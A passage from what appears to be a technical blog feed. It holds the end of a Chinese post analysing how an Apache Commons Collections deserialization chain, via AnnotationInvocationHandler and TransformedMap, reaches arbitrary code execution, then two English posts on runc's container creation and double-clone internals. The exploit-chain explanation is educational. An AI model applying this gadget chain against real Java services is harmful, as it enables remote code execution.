if (superClass == null) {
annotations = declaredAnnotations;
} else {
annotations = new HashMap<>();
superClass.initAnnotationsIfNecessary();
for (Map.Entry<Class<? extends Annotation>, Annotation> e : superClass.annotations.entrySet()) {
Class<? extends Annotation> annotationClass = e.getKey();
if (AnnotationType.getInstance(annotationClass).isInherited())
annotations.put(annotationClass, e.getValue());
}
annotations.putAll(declaredAnnotations);
}
}
</code></pre></div></div>
<p>从上述代码可知,Class类其实还有一个成员declaredAnnotations,这个成员保存的是Class自身的注解声明,如果没有父类,那么annotations和declaredAnnotations保存的是一样的数据,如果有父类,initAnnotationsIfNecessary还会将父类的注解放到annotations中。重点来到了如下调用:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
</code></pre></div></div>
<p>一路跟进,经过parseAnnotations->parseAnnotations2->parseAnnotation2,最后一个函数完成实际的注解解析工作。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private static Annotation parseAnnotation2(ByteBuffer var0, ConstantPool var1, Class<?> var2, boolean var3, Class<? extends Annotation>[] var4) {
int var5 = var0.getShort() & '\uffff';
Class var6 = null;
String var7 = "[unknown]";
try {
try {
var7 = var1.getUTF8At(var5);//var7为类名 Ltest/com/company/AnnType;
var6 = parseSig(var7, var2);//var6为 interface test.com.company.AnnType
} catch (IllegalArgumentException var18) {
var6 = var1.getClassAt(var5);
}
}...
if (var4 != null && !contains(var4, var6)) {
skipAnnotation(var0, false);
return null;
} else {
AnnotationType var8 = null;
try {
var8 = AnnotationType.getInstance(var6);//var8为AnnotationType
} catch (IllegalArgumentException var17) {
skipAnnotation(var0, false);
return null;
}
Map var9 = var8.memberTypes();
LinkedHashMap var10 = new LinkedHashMap(var8.memberDefaults());
int var11 = var0.getShort() & '\uffff';
for(int var12 = 0; var12 < var11; ++var12) {
int var13 = var0.getShort() & '\uffff';
String var14 = var1.getUTF8At(var13);
Class var15 = (Class)var9.get(var14);
if (var15 == null) {
skipMemberValue(var0);
} else {
Object var16 = parseMemberValue(var15, var0, var1, var2);
if (var16 instanceof AnnotationTypeMismatchExceptionProxy) {
((AnnotationTypeMismatchExceptionProxy)var16).setMember((Method)var8.members().get(var14));
}
var10.put(var14, var16);
}
}
return annotationForMap(var6, var10);
}
}
</code></pre></div></div>
<p>前面提到注解是一个继承自Annotation的interface,这里新出现了AnnotationType,这个是类中存放的是注解的信息。这里简单介绍一下该结构体,其中三个最主要的成为如下三个Map。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private final Map<String, Class<?>> memberTypes;
private final Map<String, Object> memberDefaults;
private final Map<String, Method> members;
</code></pre></div></div>
<p>第一个memberTypes存放的是名字到Class的对应关系,第二个memberDefaults存放的是名字到默认值的对应关系,第三个members存放的是名字到方法的对应关系。以我们例子的AnnType注解为例,成员如下:</p>
<p><img src="/assets/img/java1/5.png" alt="" /></p>
<p>AnnotationType是通过AnnotationType.getInstance创建的,parseAnnotation2调用了该函数。parseAnnotation2最后的for循环是将注解的默认值替换为实际值。比如AnnType的默认值是type,但是在Person中被设置为了xaa。</p>
<p>parseAnnotation2的最后来到了annotationForMap。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static Annotation annotationForMap(Class<? extends Annotation> var0, Map<String, Object> var1) {
return (Annotation)Proxy.newProxyInstance(var0.getClassLoader(), new Class[]{var0}, new AnnotationInvocationHandler(var0, var1));
}
</code></pre></div></div>
<p>annotationForMap创建了动态代理,这里的var0参数是AnnType的Class对象,var1是一个LinkedHashMap,里面保存了各个注解名称与值。比如Person类的注解内容”msg”->”xaa”。handler为AnnotationInvocationHandler。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
Class[] var3 = var1.getInterfaces();
if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
this.type = var1;
this.memberValues = var2;
} else {
throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
}
}
</code></pre></div></div>
<p>构造函数将Annotation的type信息和各个注解key-value保存到了memberValues中。</p>
<p>当测试例子中调用annMethod.msg()时,会调用到代理类中的invoke,代理类会调用handler的invoke,AnnotationInvocationHandler的invoke如下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object invoke(Object var1, Method var2, Object[] var3) {
String var4 = var2.getName();
Class[] var5 = var2.getParameterTypes();
if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
return this.equalsImpl(var3[0]);
} else if (var5.length != 0) {
throw new AssertionError("Too many parameters for an annotation method");
} else {
byte var7 = -1;
switch(var4.hashCode()) {
case -1776922004:
if (var4.equals("toString")) {
var7 = 0;
}
break;
case 147696667:
if (var4.equals("hashCode")) {
var7 = 1;
}
break;
case 1444986633:
if (var4.equals("annotationType")) {
var7 = 2;
}
}
switch(var7) {
case 0:
return this.toStringImpl();
case 1:
return this.hashCodeImpl();
case 2:
return this.type;
default:
Object var6 = this.memberValues.get(var4);
if (var6 == null) {
throw new IncompleteAnnotationException(this.type, var4);
} else if (var6 instanceof ExceptionProxy) {
throw ((ExceptionProxy)var6).generateException();
} else {
if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
var6 = this.cloneArray(var6);
}
return var6;
}
}
}
}
</code></pre></div></div>
<p>可以看到对于非内置的函数调用,通过var4得到方法名,接着在this.memberValues这个Map中查找,进而得到value返回。</p>
<h3> PoC分析 </h3>
<p>在PoC中,本质上写入文件的是AnnotationInvocationHandler的一个实例,其中参数是Retention.class和一个TransformedMap。正向思考,这里意思是构建一个处理Retention注解的AnnotationInvocationHandler,并且其对应的Map为TransformedMap。当然这里的TransformedMap的状态,比如transformers也会被写入到文件中。</p>
<p>当进行反序列化时,AnnotationInvocationHandler有自己的readObject,该函数会被调用。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if (var7 != null) {
Object var8 = var5.getValue();
if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
</code></pre></div></div>
<p>var1.defaultReadObject首先调用默认的反序列化函数,这样就将AnnotationInvocationHandler准备好了。</p>
<p><img src="/assets/img/java1/6.png" alt="" /></p>
<p>接下来得到Retention注解的AnnotationType结构体。</p>
<p><img src="/assets/img/java1/7.png" alt="" /></p>
<p>Retention是一个元注解,所以这里的AnnotationType是根据如下定义得到的。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Documented
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.ANNOTATION_TYPE)
public @interface Retention {
RetentionPolicy value();
}
</code></pre></div></div>
<p>现在,var3这个Map保存的是正儿八经的Retention注解的成员类型信息,其中key为”value”, value为”RetentionPolicy”这是一个自定义的类。
接下来对我们反序列化出来的this.memberValues的Map进行循环。本质上判断反序列化出来的value的类型是不是跟生成的AnnotationType的memberTypes能对得上。
由于我们在序列化构建AnnotationInvocationHandler指定的Map里面放了”value”=”test”, value的类型是String,而实际上根据AnnotationType的指示,这里需要的是一个RetentionPolicy,所以最终会调用var5.setValue,最终会调用到TransformedMap的checkSetValue函数。从而调用到了transform函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> protected Object checkSetValue(Object value) {
return this.valueTransformer.transform(value);
}
</code></pre></div></div>
<p>综上,AnnotationInvocationHandler的readObject其实本质上是在做一个校验,如果过不了这个判断,那么会调用Map的设置函数,从而触发了Transformer的transform的函数,进而执行了任意代码。</p>
<h3> 总结 </h3>
<p>本文通过一个Commons Collections的PoC详细讲解了涉及到的对于初学者比较难理解的概念,主要包括动态代理和注解实现。通过本文的分析,应该能够理解AnnotationInvocationHandler相关的Commons Collections的利用链。从本文的分析也可以看出,Commons Collections的利用还是比较复杂的,并不太适合初学者,其实Fastjson反序列化倒是没有这么复杂。</p>
runc internals, part 3: runc double clone2021-12-28T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3
<p>Now that we have analyzed the general process of ‘runc create’ and know that the ‘runc create’ will execute ‘runc init’ parent process, the parent process will clone child process, and the child process will clone a grandchild process, and this grandchild process will execute the user defined process.</p>
<p>Once I decide to draw a pic of these four process’ relation. But I found a detail pic <a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">here</a>. I just reference it here.</p>
<p><img src="/assets/img/runcinternals3/1.png" alt="" /></p>
<p>So let’s see these process’ work.</p>
<h3> parent </h3>
<p>This is runc:[0:PARENT].</p>
<ul>
<li>
<p>Got the config from runc create process. This is done by</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nl_parse(pipenum, &config); //corresponding runc create code :io.Copy(p.messageSockPair.parent, p.bootstrapData)
</code></pre></div> </div>
</li>
<li>Create two socketpair ‘sync_child_pipe’ and ‘sync_grandchild_pipe’ to sync with the child and grandchild.</li>
<li>Clone child process</li>
<li>Update the uid/gid mapping for child process</li>
<li>Receive the pid of children and grand children, and send these two to runc create process. So runc create can send config data to the grandchild.</li>
<li>Wait the grandchild to run</li>
</ul>
<h3> child </h3>
<p>This is runc:[1:CHILD].</p>
<ul>
<li>Join the namespace specified in the config.json</li>
<li>Ask the parent process to set the uid/gid mapping</li>
<li>unshare the namespace specified in config.json</li>
<li>Clone grandchild process</li>
<li>Send the pid of grandchild to parent</li>
</ul>
<h3> grandchild </h3>
<p>This is runc:[2:INIT].</p>
<ul>
<li>Now this process is in the new pid namespace.</li>
<li>Notify the parent process we are ready</li>
<li>factory.StartInitialization()</li>
<li>Config the environment specified in config.json and execute the process</li>
</ul>
<h3> summary </h3>
<p>The first clone is to let the parent to set the uid/gid mapping. The second clone is to make the pid namespace take effect. After these double clone, the child process is totally in the desirable new environment.</p>
<h3> reference </h3>
<p><a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">runc源码分析</a>
<a href="https://zdyxry.github.io/2020/04/12/runc-nsenter-%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB/">runc nsenter 源码阅读</a></p>
runc internals, part 2: create and run a container2021-12-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/23/runc-internals-2
<h3> runc create analysis </h3>
<p>We can create a container by run ‘runc create’, for not consider the tty/console, let’s change the default ‘config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "terminal": false,
...
"args": [
"sleep",
"1000"
],
</code></pre></div></div>
<p>I list the important function call in the following.</p>
<p>startContainer
–>setupSpec
–>createContainer
–>specconv.CreateLibcontainerConfig
–>loadFactory
–>factory.Create
–>manager.New</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--runner.run
-->newProcess
-->setupIO
-->r.container.Start
-->c.createExecFifo
-->c.start
-->c.newParentProcess
-->c.commandTemplate
-->c.newInitProcess
-->parent.start
-->p.cmd.Start
-->p.sendConfig
</code></pre></div></div>
<p>The create process contains three steps in general which I have split them with empty line.</p>
<p>The first is the prepare work, the code is mostly in ‘utils_linux.go’. It contains following:</p>
<ul>
<li>load spec from config.json</li>
<li>create a container object using factory pattern</li>
<li>create a runner and call the runner.run</li>
</ul>
<p>The second is the runner.run process, the code is mostly in ‘container_linux.go’. It contains following:</p>
<ul>
<li>Call the container.Start, thus go to the libcontainer layer</li>
<li>Call internal function c.start, this function create a newParentProcess</li>
<li>Call parent.start</li>
</ul>
<p>The third is the parent.start(), the coe is in ‘init.go’ and ‘nsenter.c’. It contains following:</p>
<ul>
<li>p.cmd.Start, this will create a child process which is ‘runc init’.</li>
<li>The runc init process will do double clone and finally run the process defined in config.json, this is an interesting process, I will use a separate post to analysis it.</li>
</ul>
<p>Ok, let’s dig into more of the code.</p>
<h3> prepare </h3>
<p>Following pic show the prepare work.</p>
<p><img src="/assets/img/runcinternals2/1.png" alt="" /></p>
<p>‘startContainer’ calls setupSpec to get the spec from config.json. Then call ‘createContainer’ to get a new container object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
if err := revisePidFile(context); err != nil {
return -1, err
}
spec, err := setupSpec(context)
...
container, err := createContainer(context, id, spec)
...
}
</code></pre></div></div>
<p>Linux has no built-in container concept. libcontainer use a ‘linuxContainer’ to represent a container concept.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type linuxContainer struct {
id string
root string
config *configs.Config
cgroupManager cgroups.Manager
intelRdtManager intelrdt.Manager
initPath string
initArgs []string
initProcess parentProcess
initProcessStartTime uint64
criuPath string
newuidmapPath string
newgidmapPath string
m sync.Mutex
criuVersion int
state containerState
created time.Time
fifo *os.File
}
</code></pre></div></div>
<p>As we can see, there are several container-related fields. The ‘initPath’ specify the init program for spawning a container. ‘initProcess’ is the process represent of the init program.</p>
<p>A linuxContainer is created by a ‘LinuxFactory’. The createContainer can be easily understood. It first create a libcontainer config and then create LinuxFactory(by calling loadFactory) and finally create a linuxContainer(by calling factory.Create).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func createContainer(context *cli.Context, id string, spec *specs.Spec) (libcontainer.Container, error) {
rootlessCg, err := shouldUseRootlessCgroupManager(context)
if err != nil {
return nil, err
}
config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
CgroupName: id,
UseSystemdCgroup: context.GlobalBool("systemd-cgroup"),
NoPivotRoot: context.Bool("no-pivot"),
NoNewKeyring: context.Bool("no-new-keyring"),
Spec: spec,
RootlessEUID: os.Geteuid() != 0,
RootlessCgroups: rootlessCg,
})
if err != nil {
return nil, err
}
factory, err := loadFactory(context)
if err != nil {
return nil, err
}
return factory.Create(id, config)
}
</code></pre></div></div>
<p>‘loadFactory’ will call ‘libcontainer.New’ to create a new Factory. As we can see the ‘InitPath’ is set to the runc program it self and the ‘InitArgs’ is set to ‘init’. This means ‘runc init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
...
l := &LinuxFactory{
Root: root,
InitPath: "/proc/self/exe",
InitArgs: []string{os.Args[0], "init"},
Validator: validate.New(),
CriuPath: "criu",
}
...
}
</code></pre></div></div>
<p>After create the factory, ‘createContainer’ call ‘factory.Create’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *LinuxFactory) Create(id string, config *configs.Config) (Container, error) {
...
cm, err := manager.New(config.Cgroups)
...
if err := os.MkdirAll(containerRoot, 0o711); err != nil {
return nil, err
}
if err := os.Chown(containerRoot, unix.Geteuid(), unix.Getegid()); err != nil {
return nil, err
}
c := &linuxContainer{
id: id,
root: containerRoot,
config: config,
initPath: l.InitPath,
initArgs: l.InitArgs,
criuPath: l.CriuPath,
newuidmapPath: l.NewuidmapPath,
newgidmapPath: l.NewgidmapPath,
cgroupManager: cm,
}
...
c.state = &stoppedState{c: c}
return c, nil
}
</code></pre></div></div>
<p>Notice, we can see ‘initPath’ and ‘initArgs’ of linuxContainer is assigned from the LinuxFactory. Also the ‘factory.Create’ create a directory as the container root. After creating the container, ‘startContainer’ create a ‘runner’ and calls ‘r.run’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
...
r := &runner{
enableSubreaper: !context.Bool("no-subreaper"),
shouldDestroy: !context.Bool("keep"),
container: container,
listenFDs: listenFDs,
notifySocket: notifySocket,
consoleSocket: context.String("console-socket"),
detach: context.Bool("detach"),
pidFile: context.String("pid-file"),
preserveFDs: context.Int("preserve-fds"),
action: action,
criuOpts: criuOpts,
init: true,
}
return r.run(spec.Process)
}
</code></pre></div></div>
<p>The runner object is just as its name indicates, a runner. It allows the user to run a process in a container. The ‘runner’ contains the ‘container’ and also some other control options. And the ‘action’ can ‘CT_ACT_CREATE’ means just create and ‘CT_ACT_RUN’ means create and run. The ‘init’ decides whether we should do the initialization work. This can be false if we exec a new process in an exist container.
The ‘r.run’s parameter is ‘spec.Process’ which is the process we need to execute in config.json.</p>
<p>Let’s go to the ‘r.run’, ‘newProcess’ create a new ‘libcontainer.Process’ object and ‘setupIO’ initialization the process’s IO.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (r *runner) run(config *specs.Process) (int, error) {
var err error
...
process, err := newProcess(*config)
...
// Populate the fields that come from runner.
process.Init = r.init
...
tty, err := setupIO(process, rootuid, rootgid, config.Terminal, detach, r.consoleSocket)
if err != nil {
return -1, err
}
defer tty.Close()
switch r.action {
case CT_ACT_CREATE:
err = r.container.Start(process)
case CT_ACT_RESTORE:
err = r.container.Restore(process, r.criuOpts)
case CT_ACT_RUN:
err = r.container.Run(process)
default:
panic("Unknown action")
}
...
return status, err
}
</code></pre></div></div>
<p>Finally, according the ‘r.action’ we can corresponding function, in the create case the ‘r.container.Start’ will be called.</p>
<h3> container start </h3>
<p>Following pic show the container start process.</p>
<p><img src="/assets/img/runcinternals2/2.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) Start(process *Process) error {
c.m.Lock()
defer c.m.Unlock()
if c.config.Cgroups.Resources.SkipDevices {
return errors.New("can't start container with SkipDevices set")
}
if process.Init {
if err := c.createExecFifo(); err != nil {
return err
}
}
if err := c.start(process); err != nil {
if process.Init {
c.deleteExecFifo()
}
return err
}
return nil
}
</code></pre></div></div>
<p>‘c.createExecFifo’ create a fifo in container directory, the default path is ‘/run/runc/<container id>/exec.fifo’
Then we reach to the internal start fucntion. The most work of ‘start’ is create a new parentProcess. A parentProcess just as its name indicates, it’s a process to lanuch child process which is the process defined in config.json. Why we need parentProcess, because we can’t put the one process in a container environment (separete namespace, cgroup control and so on) in one step. It needs severals steps. ‘parentProcess’ is an interface in runc, it has two implementation ‘setnsProcess’ and ‘initProcess’. These two again is used in the ‘runc exec’ and ‘runc creat/run’ two cases.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) start(process *Process) (retErr error) {
parent, err := c.newParentProcess(process)
...
if err := parent.start(); err != nil {
return fmt.Errorf("unable to start container process: %w", err)
}
...
}
</code></pre></div></div>
<p>The ‘initProcess’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type initProcess struct {
cmd *exec.Cmd
messageSockPair filePair
logFilePair filePair
config *initConfig
manager cgroups.Manager
intelRdtManager intelrdt.Manager
container *linuxContainer
fds []string
process *Process
bootstrapData io.Reader
sharePidns bool
}
</code></pre></div></div>
<p>The ‘cmd’ is the parent process’s program and args, the ‘process’ is the process info defined in config.json, the ‘bootstrapData’ contains the data that should be sent to the child process from parent.
Let’s see how the parentProcess is created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
if err != nil {
return nil, fmt.Errorf("unable to create init pipe: %w", err)
}
messageSockPair := filePair{parentInitPipe, childInitPipe}
parentLogPipe, childLogPipe, err := os.Pipe()
if err != nil {
return nil, fmt.Errorf("unable to create log pipe: %w", err)
}
logFilePair := filePair{parentLogPipe, childLogPipe}
cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
...
return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
</code></pre></div></div>
<p>‘c.commandTemplate’ prepare the parentProcess’s command line. As we can see, the command is set to ‘c.initPath’ and ‘c.initArgs’. This is the ‘runc init’.It also add some environment variables to the parentProcess cmd. Two fd one for initpipe and one for logpipe is added through this way.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
cmd := exec.Command(c.initPath, c.initArgs[1:]...)
cmd.Args[0] = c.initArgs[0]
cmd.Stdin = p.Stdin
cmd.Stdout = p.Stdout
cmd.Stderr = p.Stderr
cmd.Dir = c.config.Rootfs
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &unix.SysProcAttr{}
}
cmd.Env = append(cmd.Env, "GOMAXPROCS="+os.Getenv("GOMAXPROCS"))
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
if p.ConsoleSocket != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
)
}
cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_STATEDIR="+c.root,
)
cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_LOGLEVEL="+p.LogLevel,
)
// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
if c.config.ParentDeathSignal > 0 {
cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
}
return cmd
}
</code></pre></div></div>
<p>After prepare the cmd, ‘newParentProcess’ calls ‘newInitProcess’ to create a ‘initProcess’ object. ‘newInitProcess’ also create some bootstrap data, the data contains the clone flags in config.json and the nsmaps, this defines what namespaces will be used in the process of config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
nsMaps := make(map[configs.NamespaceType]string)
for _, ns := range c.config.Namespaces {
if ns.Path != "" {
nsMaps[ns.Type] = ns.Path
}
}
_, sharePidns := nsMaps[configs.NEWPID]
data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps, initStandard)
...
init := &initProcess{
cmd: cmd,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
manager: c.cgroupManager,
intelRdtManager: c.intelRdtManager,
config: c.newInitConfig(p),
container: c,
process: p,
bootstrapData: data,
sharePidns: sharePidns,
}
c.initProcess = init
return init, nil
}
</code></pre></div></div>
<p>‘CloneFlags’ return the clone flags which parsed from the config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (n *Namespaces) CloneFlags() uintptr {
var flag int
for _, v := range *n {
if v.Path != "" {
continue
}
flag |= namespaceInfo[v.Type]
}
return uintptr(flag)
}
</code></pre></div></div>
<p>The default created new namespaces contains following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
}
],
</code></pre></div></div>
<p>After create a ‘parentProcess’, the ‘parent.start()’ is called to start the parent process in linuxContainer.start function. This function will create the initialization function by calling ‘p.cmd.Start()’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (p *initProcess) start() (retErr error) {
defer p.messageSockPair.parent.Close() //nolint: errcheck
err := p.cmd.Start()
...
}
</code></pre></div></div>
<h3> parent start </h3>
<p>Following pic is the brief description of this phase.</p>
<p><img src="/assets/img/runcinternals2/3.png" alt="" /></p>
<p>‘p.cmd.Start()’ will start a new process, its parent process, which is ‘runc init’. The handler of ‘init’ is in the ‘init.go’ file. The go is a high level language, but the namespace operations is so low level, so it should be handled not in the code. So init.go, it has import a nsenter pkg.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> _ "github.com/opencontainers/runc/libcontainer/nsenter"
</code></pre></div></div>
<p>nsenter pkg contains cgo code as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package nsenter
/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
nsexec();
}
*/
import "C"
</code></pre></div></div>
<p>So the nsexec will be executed first. The code is in the ‘libcontainer/nsenter/nsexec.c’.
‘nsexec’ is a long function that I will use another post to discuss it. Here is just a summary of this parent process.
In the ‘runc init’ parent process (which is runc:[0:PARENT]), it will clone a new process, which is named ‘runc:[1:CHILD]’, in the runc:[1:CHILD] process, it will set the namespace, but as the pid namespace only take effect in the children process the ‘runc:[1:CHILD]’ process will clone another process named ‘runc:[2:INIT]’. The original runc create process will do some sync work with these process.</p>
<p>Now the ‘runc:[2:INIT]’ is totally in new namespaces, the ‘init.go’ will call factory.StartInitialization to do the final initialization work and exec the process defined in config.json. ‘factory.StartInitialization’ will create a new ‘initer’ object, the ‘initer’ is an interface. Not surprisingly, there are two implementation which is one for ‘runc exec’(linuxSetnsInit) and one for ‘runc create/run’(linuxStandardInit). ‘StartInitialization’ finally calls the ‘i.Init()’ do the really initialization work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
// This is a low level implementation detail of the reexec and should not be consumed externally
func (l *LinuxFactory) StartInitialization() (err error) {
...
i, err := newContainerInit(it, pipe, consoleSocket, fifofd, logPipeFd, mountFds)
if err != nil {
return err
}
// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
return i.Init()
}
</code></pre></div></div>
<p>Following is main routine of Init(). The Init’s work is mostly setting the configuration specified in the config.json. For example, setupNetwork, setupRoute, hostName, apply apparmor profile, sysctl, readonly path, seccomp and so on.
Notice near the end of this function, it opens the execfifo pipe file which is the ‘/run/runc/<container id>/exec.fifo’. It writes data to it. As there is no reader for this pipe, so this write will be blocked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *linuxStandardInit) Init() error {
...
if err := setupNetwork(l.config); err != nil {
return err
}
if err := setupRoute(l.config.Config); err != nil {
return err
}
// initialises the labeling system
selinux.GetEnabled()
// We don't need the mountFds after prepareRootfs() nor if it fails.
err := prepareRootfs(l.pipe, l.config, l.mountFds)
...
if hostname := l.config.Config.Hostname; hostname != "" {
if err := unix.Sethostname([]byte(hostname)); err != nil {
return &os.SyscallError{Syscall: "sethostname", Err: err}
}
}
if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
return fmt.Errorf("unable to apply apparmor profile: %w", err)
}
for key, value := range l.config.Config.Sysctl {
if err := writeSystemProperty(key, value); err != nil {
return err
}
}
for _, path := range l.config.Config.ReadonlyPaths {
if err := readonlyPath(path); err != nil {
return fmt.Errorf("can't make %q read-only: %w", path, err)
}
}
for _, path := range l.config.Config.MaskPaths {
if err := maskPath(path, l.config.Config.MountLabel); err != nil {
return fmt.Errorf("can't mask path %s: %w", path, err)
}
}
pdeath, err := system.GetParentDeathSignal()
if err != nil {
return fmt.Errorf("can't get pdeath signal: %w", err)
}
if l.config.NoNewPrivileges {
...
if l.config.Config.Seccomp != nil && !l.config.NoNewPrivileges {
seccompFd, err := seccomp.InitSeccomp(l.config.Config.Seccomp)
if err != nil {
return err
}
if err := syncParentSeccomp(l.pipe, seccompFd); err != nil {
return err
}
}
if err := finalizeNamespace(l.config); err != nil {
return err
}
...
// Close the pipe to signal that we have completed our init.
logrus.Debugf("init: closing the pipe to signal completion")
_ = l.pipe.Close()
// Close the log pipe fd so the parent's ForwardLogs can exit.
if err := unix.Close(l.logFd); err != nil {
return &os.PathError{Op: "close log pipe", Path: "fd " + strconv.Itoa(l.logFd), Err: err}
}
// Wait for the FIFO to be opened on the other side before exec-ing the
// user process. We open it through /proc/self/fd/$fd, because the fd that
// was given to us was an O_PATH fd to the fifo itself. Linux allows us to
// re-open an O_PATH fd through /proc.
fifoPath := "/proc/self/fd/" + strconv.Itoa(l.fifoFd)
fd, err := unix.Open(fifoPath, unix.O_WRONLY|unix.O_CLOEXEC, 0)
if err != nil {
return &os.PathError{Op: "open exec fifo", Path: fifoPath, Err: err}
}
if _, err := unix.Write(fd, []byte("0")); err != nil {
return &os.PathError{Op: "write exec fifo", Path: fifoPath, Err: err}
}
// Close the O_PATH fifofd fd before exec because the kernel resets
// dumpable in the wrong order. This has been fixed in newer kernels, but
// we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
// N.B. the core issue itself (passing dirfds to the host filesystem) has
// since been resolved.
// https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
_ = unix.Close(l.fifoFd)
s := l.config.SpecState
